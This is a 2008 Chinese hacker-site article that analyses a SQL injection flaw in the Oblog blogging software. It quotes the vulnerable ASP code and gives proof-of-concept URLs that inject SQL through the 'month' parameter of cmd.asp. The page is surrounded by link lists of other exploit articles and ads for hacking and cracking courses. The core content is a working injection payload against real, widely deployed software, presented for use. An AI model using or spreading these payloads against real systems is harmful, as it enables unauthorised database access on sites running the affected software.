黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·Oblog最新注入漏洞分析07-01·涂鸦网提供的免费图片存07-01
·爱我啦提供免费域名转向07-01·中意互联为您你提供200M07-01
·利用App Engine架设自己06-30·风讯7月份最新注入漏洞利06-30
·TP-Link TL-WR541G+ 无故06-30·不许动我的IE,系统DLL修06-30
·萤火虫提供500M网络免费06-30·太阳海提供无广告免费二06-30
·新浪空间提供免费免费博06-30·世界之窗等浏览器本地xs06-28
·轻松杀死顽固不化木马病06-28·如何用Visual Basic编写06-28
·Vista序列号藏何方?两种06-28·读泉州师院论坛提供100M06-28
·禁用XP四大自动播放功能06-27·绝对神奇!无需打开文件06-27
·北京分类信息提供100M A06-27·阻止网页挂马的若干工具06-26
·关于XSS漏洞另一个攻击趋06-26·注册表应用点点通06-26
·电脑高手的140个电脑小技06-26·d0m.us提供50G免费php空06-26
·百度首页惊爆挂马漏洞06-25·SQL注入攻击的种类和防范06-25
·我爱吧免费主机提供100-06-25·Vista下:享受不一样的远06-24
[推荐]Oblog最新注入漏洞分析
        ★★★★

Oblog最新注入漏洞分析

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-7-1 10:39:13

代码分析:

文件In/Class_UserCommand.asp :

strMonth=Request("month") //第63行

strDay=Request("day")

……

Case "month" //第84行

Dim LastDay

G_P_FileName = G_P_FileName & "month&month=" & strMonth

strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"

mYear=Left(strMonth,4)

mMonth=Right(strMonth,2)

If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then

LastDay = "31"……

Else //第109行

SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "

构造合适的变量strMonth进行注射

测试方法:

http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为:

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    新云CMS Online.asp页面过滤不严02-26
    对网软网上购物系统的漏洞分析01-09
    测试SQL防注入脚本12-21
    Google Xss又出跨站新漏洞11-06
    一次简单的html injection导致的11-06
    风讯、科讯漏洞利用11-01
    Adobe pdf reader URI利用方式浅10-23
    超星阅览器的最新0DAY10-19
    运用SQL Injection做数据库渗透的09-22
    sa-blog 0day09-22
    HTML注入的一些简单想法09-10
    网站登陆接口的攻与防09-04
    相 关 文 章
    风讯7月份最新注入漏洞利用
    世界之窗等浏览器本地xss跨域漏洞POC
    关于XSS漏洞另一个攻击趋势
    百度首页惊爆挂马漏洞
    SQL注入攻击的种类和防范手段
    万网虚拟机漏洞,拿某VIP木马所有会员
    跨站脚本漏洞导致的浏览器劫持攻击(内附
    Yahoo! 统计功能跨站脚本漏洞
    详解WINRAR的自解压跨站攻击漏洞
    妙招让漏洞变陷阱来折磨入侵的人
    phpinfo跨站脚本漏洞
    对著名快递公司的一次艰难的oracle注入
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886